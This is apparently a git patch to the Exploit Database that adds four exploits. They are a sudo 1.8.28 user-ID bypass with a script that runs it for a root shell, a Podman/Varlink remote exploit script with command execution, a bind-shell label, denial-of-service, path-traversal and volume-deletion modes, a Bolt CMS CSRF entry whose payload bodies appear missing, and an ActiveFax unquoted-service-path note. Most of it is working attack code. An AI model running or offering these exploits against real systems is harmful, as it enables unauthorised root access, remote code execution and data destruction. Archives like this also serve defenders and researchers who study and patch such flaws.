From bae704d68183a940e81f3c871755cdd8d575727c Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Wed, 16 Oct 2019 05:01:45 +0000 Subject: [PATCH] DB: 2019-10-16 4 changes to exploits/shellcodes sudo 1.8.28 - Security Bypass ActiveFax Server 6.92 Build 0316 - 'ActiveFaxServiceNT' Unquoted Service Path Podman & Varlink 1.5.1 - Remote Code Execution Bolt CMS 3.6.10 - Cross-Site Request Forgery --- exploits/linux/local/47502.py | 80 +++++++ exploits/linux/remote/47500.py | 302 +++++++++++++++++++++++++ exploits/php/webapps/47501.txt | 368 +++++++++++++++++++++++++++++++ exploits/windows/local/47503.txt | 22 ++ files_exploits.csv | 4 + 5 files changed, 776 insertions(+) create mode 100755 exploits/linux/local/47502.py create mode 100755 exploits/linux/remote/47500.py create mode 100644 exploits/php/webapps/47501.txt create mode 100644 exploits/windows/local/47503.txt diff --git a/exploits/linux/local/47502.py b/exploits/linux/local/47502.py new file mode 100755 index 000000000..881633be8 --- /dev/null +++ b/exploits/linux/local/47502.py @@ -0,0 +1,80 @@ +# Exploit Title : sudo 1.8.28 - Security Bypass +# Date : 2019-10-15 +# Original Author: Joe Vennix +# Exploit Author : Mohin Paramasivam +# Version : Sudo <1.2.28 +# Tested on Linux +# Credit : Joe Vennix from Apple Information Security found and analyzed the bug +# Fix : The bug is fixed in sudo 1.8.28 +# CVE : N/A + +'''Check for the user sudo permissions + +sudo -l + +User hacker may run the following commands on kali: + (ALL, !root) /bin/bash + + +So user hacker can't run /bin/bash as root (!root) + + +User hacker sudo privilege in /etc/sudoers + +# User privilege specification +root ALL=(ALL:ALL) ALL + +hacker ALL=(ALL,!root) /bin/bash + + +With ALL specified, user hacker can run the binary /bin/bash as any user + +EXPLOIT: + +sudo -u#-1 /bin/bash + +Example : + +hacker@kali:~$ sudo -u#-1 /bin/bash +root@kali:/home/hacker# id +uid=0(root) gid=1000(hacker) groups=1000(hacker) +root@kali:/home/hacker# + +Description : +Sudo doesn't check for the existence of the specified user id and executes the with arbitrary user id with the sudo priv +-u#-1 returns as 0 which is root's id + +and /bin/bash is executed with root permission +Proof of Concept Code : + +How to use : +python3 sudo_exploit.py + +''' + + +#!/usr/bin/python3 + +import os + +#Get current username + +username = input("Enter current username :") + + +#check which binary the user can run with sudo + +os.system("sudo -l > priv") + + +os.system("cat priv | grep 'ALL' | cut -d ')' -f 2 > binary") + +binary_file = open("binary") + +binary= binary_file.read() + +#execute sudo exploit + +print("Lets hope it works") + +os.system("sudo -u#-1 "+ binary) \ No newline at end of file diff --git a/exploits/linux/remote/47500.py b/exploits/linux/remote/47500.py new file mode 100755 index 000000000..b11dccbc6 --- /dev/null +++ b/exploits/linux/remote/47500.py @@ -0,0 +1,302 @@ +# Exploit Title: Podman & Varlink 1.5.1 - Remote Code Execution +# Exploit Author: Jeremy Brown +# Date: 2019-10-15 +# Vendor Homepage: https://podman.io/ +# Software Link: dnf install podman or https://github.com/containers/libpod/releases +# Version: 1.5.1 +# Tested on: Fedora Server 30 + +#!/usr/bin/python +# -*- coding: UTF-8 -*- +# +# pickletime.py +# +# Podman + Varlink Insecure Config Remote Exploit +# +# ------- +# Details +# ------- +# +# Podman is container engine / platform similar to Docker supported +# by RedHat and Fedora with Varlink being a protocol to exchange +# messages, which comes in handy for things like a Remote API. +# +# Now depending on how Podman and Varlink are deployed, they can be +# susceptible to local and remote attacks. There are a few API bugs +# in Podman itself, as well as a way to execute arbitary commands if +# one can hit Podman via the Remote API. Running Podman with Varlink +# over tcp listening either on localhost or the network interface is the +# most vulnerable setup, but other ways such as access via the local UNIX +# socket or over SSH (key /w no passphrase is common) aren't likely +# to be vulnerable unless ACLs or other stuff is broken. +# +# ------------------ +# Testing the issues +# ------------------ +# +# - check; just connects and issues GetInfo() to see if the host is +# running a podman service +# +# - exec; arbitrary cmd execution via ContainerRunlabel() specified +# by "run" label in the specified hosted image (self-setup) +# +# - dos; crash the server via choosing a /random/ selection from +# the available parsing bugs in APIs (we like to have fun here) +# +# - blind; dir traversal in SearchImages() API to force server to +# read an arbitrary file (no client-side output) +# +# - volrm; loops to remove all volumes via VolumeRemove() behavior +# +# --------- +# Exec demo +# --------- +# +# $ ./pickletime.py check podman-host:6000 +# -> Podman service confirmed on host +# +# Then create a Dockerfile with an edgy label, build and host it. +# +# [Dockerfile] +# FROM busybox +# LABEL run=“nc -l -p 10000 -e /bin/bash” +# +# $ ./pickletime.py exec podman-host:6000 docker-registry:5000/image run +# Done! +# +# $ nc podman-host 10000 +# ps +# PID TTY TIME CMD +# 111640 pts/1 00:00:00 bash +# 111786 pts/1 00:00:00 podman +# 111797 pts/1 00:00:00 nc +# 111799 pts/1 00:00:00 bash +# 111801 pts/1 00:00:00 ps +# +# +# Tested Podman 1.4.4/1.5.1 and Varlink 18 on Fedora Server 30 x64 +# +# ----------- +# Other stuff +# ----------- +# +# Note: admins can really setup their connection and deployment configuration +# however they like, so it's hard to say how many folks are 'doing it wrong' +# or actually are running with proper auth and hardening in place. Shodan +# folks have been contacted about adding support to discover Varlink services +# to get more data that way as well. +# +# Fixed bugs: +# - DoS #2 was fixed in 1.5.1 +# - Updated security docs / cli flags TBD +# +# > Why pickles? Why not. +# +# Dependencies to run this code: +# +# sudo dnf install -y python3-podman-api +# +# +# + +import os +import sys +import socket +import subprocess +import random +import json +import podman +import pickle +import time + +serviceName = 'io.podman' # service name + +def main(): + if(len(sys.argv) < 2): + print("Usage: %s [action....params]\n" % sys.argv[0]) + print("Eg: %s check tcp:podman-host:6000" % sys.argv[0]) + print("... %s exec tcp:podman-host:6000 docker-registry:5000/image run\n" % sys.argv[0]) + print("Actions: check, exec, dos, blind, volrm\n") + return + + action = sys.argv[1] + address = sys.argv[2] # eg. unix:/run/podman/io.podman for local testing + + ip = address.split(':')[1] + port = int(address.split(':')[2]) + + if(action == 'exec'): + if(len(sys.argv) < 4): + print("Error: need more args for exec") + return + + image = sys.argv[3] # 'source' for pull + label = sys.argv[4] + + isItTime() + + try: + pman = podman.Client(uri=address) + except Exception: + print("Error: can't connect to host") + return + + if(action == 'check'): + result = json.dumps(pman.system.info()) + + if('podman_version' in result): + print("-> Podman service confirmed on host") + return + + print("-!- Podman service was not found on host") + + + elif(action == 'exec'): + # + # First pull the image from the repo, then run the label + # + try: + result = pman.images.pull(image) # PullImage() + except Exception as error: + pass # call fails sometimes if image already exists which is *ok* + + # + # ContainerRunlabel() ... but, no library imp. we'll do it live! + # + method = serviceName + '.' + 'ContainerRunlabel' + + message = '{\"method\":\"' + message += method + message += '\",\"parameters\":' + message += '{\"Runlabel\":{\"image\":\"' + message += image + message += '\",\"label\":\"' + message += label + message += '\"}}}' + message += '\0' # end each msg with a NULL byte + + doSocketSend(ip, port, message) + + + elif(action == 'dos'): + #bug = 1 # !fun + bug = random.randint(1,2) # fun + + if(bug == 1): + print("one") + source = 'test' + + method = serviceName + '.' + 'LoadImage' + + message = '{\"method\":\"' + message += method + message += '\",\"parameters\":' + message += '{\"source":\"' + message += source + message += '\"}}' + message += '\0' + + doSocketSend(ip, port, message) + + + # works on 1.4.4, fixed in 1.5.1 + if(bug == 2): + print("two") + + reference = 'b' * 238 + source = '/dev/null' # this file must exist locally + + method = serviceName + '.' + 'ImportImage' + + message = '{\"method\":\"' + message += method + message += '\",\"parameters\":' + message += '{\"reference\":\"' + message += reference + message += '\",\"source\":\"' + message += source + message += '\"}}' + message += '\0' + + doSocketSend(ip, port, message) + + + # + # blind read of arbitrary files server-side + # ...interesting but not particularly useful by itself + # + # openat(AT_FDCWD, "/etc/passwd", O_RDONLY|O_CLOEXEC) = 7 + # lseek(7, 0, SEEK_CUR) = 0 + # fstat(7, {st_mode=S_IFREG|0644, st_size=1672, ...}) = 0 + # read(7, "root:x:0:0:root:/root:/bin/bash\n"..., 4096) = 1672 + # close(7) + # + elif(action == 'blind'): + method = serviceName + '.' + 'SearchImages' + query = '../../../etc/passwd/' # magic '/' at the end + + message = '{\"method\":\"' + message += method + message += '\",\"parameters\":' + message += '{\"query\":\"' + message += query + message += '\"}}' + message += '\0' + + #pman.images.search(query) # unclear why this doesn't work + doSocketSend(ip, port, message) + + # + # Not really a bug, but an interesting feature to demo without auth + # note: call CreateVolume() a few times beforehand to test the removal + # + elif(action == 'volrm'): + method = serviceName + '.' + 'VolumeRemove' + n = 10 # this is probably enough to test, but change as necessary + + message = '{\"method\":\"' + message += method + message += '\",\"parameters\":' + message += '{\"options\":{\"volumes\":[\"\"]}}}' # empty = alphabetical removal + message += '\0' + + for _ in range(n): + doSocketSend(ip, port, message) + time.sleep(0.5) # server processing time + + print("Done!") + + +# +# podman/varlink libaries don't support calling these API calls, so native we must +# +def doSocketSend(ip, port, message): + try: + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + sock.connect((ip, port)) + sock.send(message.encode()) + + except Exception as error: + print(str(error)) + return + + finally: + sock.close() + + +# +# obligatory routine +# +def isItTime(): + tm = time.localtime() + + p = pickle.dumps('it\'s pickle time!') + + if((str(tm.tm_hour) == '11') and (str(tm.tm_min) == '11')): + print(pickle.loads(p)) + else: + pass # no dill + + +if(__name__ == '__main__'): + main() \ No newline at end of file diff --git a/exploits/php/webapps/47501.txt b/exploits/php/webapps/47501.txt new file mode 100644 index 000000000..e10136e7d --- /dev/null +++ b/exploits/php/webapps/47501.txt @@ -0,0 +1,368 @@ +# Exploit Title: Bolt CMS 3.6.10 - Cross-Site Request Forgery +# Date: 2019-10-15 +# Exploit Author: r3m0t3nu11[Zero-Way] +# Vendor Homepage: https://bolt.cm/ +# Software Link: https://bolt.cm/ +# Version: up to date and 6.5 +# Tested on: Linux +# CVE : N/A + +# last version + +# Csrf p0c + + + +Bolt v 3.x exploit 0day + +

Bolt v 3.x csrf -> xss -> rce exploit

+ + + +
+ +
+ + + +JS p0c + + + + +version 6.5 + +CSrf p0c + + + +Bolt v 3.x CVE-2019-17591 exploit + +

Bolt v 3.x csrf -> xss -> rce exploit

+ + + +
+ +
+ + + +Js p0c + + + + +proof of concept : + +https://drive.google.com/file/d/1TRjzOM-q8cWK1JA9cN1Auhp7Ao3AXtbp/view?usp=sharing + +https://drive.google.com/file/d/1QSE7Dnx0XZth9WciaohjhA6nk_-9jCr1/view?usp=sharing + +Greetz to : +Samir-dz,YokO,0n3,Mr_Hex,syfi2k,Q8Librarian,Dr_hEx,dracula1337,z0mbi3_h4ck3r,Red +Virus,m7md1337,D3vil1337,and all my friends \ No newline at end of file diff --git a/exploits/windows/local/47503.txt b/exploits/windows/local/47503.txt new file mode 100644 index 000000000..c970fc1d9 --- /dev/null +++ b/exploits/windows/local/47503.txt @@ -0,0 +1,22 @@ +# Exploit Title : ActiveFax Server 6.92 Build 0316 - 'ActiveFaxServiceNT' Unquoted Service Path +# Date : 2019-10-15 +# Exploit Author : Cakes +# Vendor Homepage: https://www.actfax.com/ +# Software Link : https://www.actfax.com/download/actfax_setup_x64_ge.exe +# Version : ActiveFax Server 6.92 Build 0316 +# Tested on Windows 10 +# CVE : N/A + +sc qc ActiveFaxServiceNT +[SC] QueryServiceConfig SUCCESS + +SERVICE_NAME: ActiveFaxServiceNT + TYPE : 10 WIN32_OWN_PROCESS + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : C:\Program Files\ActiveFax\Server\ActSrvNT.exe + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : ActiveFax-Server-Dienst + DEPENDENCIES : + SERVICE_START_NAME : .\Administrator \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index f84711ec5..2a21ceb3f 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -10716,6 +10716,8 @@ id,file,description,date,author,type,platform,port 47482,exploits/linux/local/47482.rb,"ASX to MP3 converter 3.1.3.7 - '.asx' Local Stack Overflow (Metasploit_ DEP Bypass)",2019-10-10,max7253,local,linux, 47490,exploits/windows/local/47490.txt,"National Instruments Circuit Design Suite 14.0 - Local Privilege Escalation",2019-10-11,"Ivan Marmolejo",local,windows, 47493,exploits/windows/local/47493.txt,"Uplay 92.0.0.6280 - Local Privilege Escalation",2019-10-14,"Kusol Watchara-Apanukorn",local,windows, +47502,exploits/linux/local/47502.py,"sudo 1.8.28 - Security Bypass",2019-10-15,"Mohin Paramasivam",local,linux, +47503,exploits/windows/local/47503.txt,"ActiveFax Server 6.92 Build 0316 - 'ActiveFaxServiceNT' Unquoted Service Path",2019-10-15,cakes,local,windows, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -17713,6 +17715,7 @@ id,file,description,date,author,type,platform,port 47442,exploits/hardware/remote/47442.py,"Cisco Small Business 220 Series - Multiple Vulnerabilities",2019-09-30,bashis,remote,hardware, 47456,exploits/windows/remote/47456.rb,"DOUBLEPULSAR - Payload Execution and Neutralization (Metasploit)",2019-10-02,Metasploit,remote,windows, 47472,exploits/windows/remote/47472.py,"freeFTP 1.0.8 - 'PASS' Remote Buffer Overflow",2019-10-07,"Chet Manly",remote,windows, +47500,exploits/linux/remote/47500.py,"Podman & Varlink 1.5.1 - Remote Code Execution",2019-10-15,"Jeremy Brown",remote,linux, 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php, @@ -41828,3 +41831,4 @@ id,file,description,date,author,type,platform,port 47496,exploits/php/webapps/47496.txt,"Express Invoice 7.12 - 'Customer' Persistent Cross-Site Scripting",2019-10-14,"Debashis Pal",webapps,php, 47497,exploits/python/webapps/47497.py,"Ajenti 2.1.31 - Remote Code Execution",2019-10-14,"Jeremy Brown",webapps,python, 47498,exploits/php/webapps/47498.txt,"Kirona-DRS 5.5.3.5 - Information Disclosure",2019-10-14,Ramikan,webapps,php, +47501,exploits/php/webapps/47501.txt,"Bolt CMS 3.6.10 - Cross-Site Request Forgery",2019-10-15,r3m0t3nu11,webapps,php,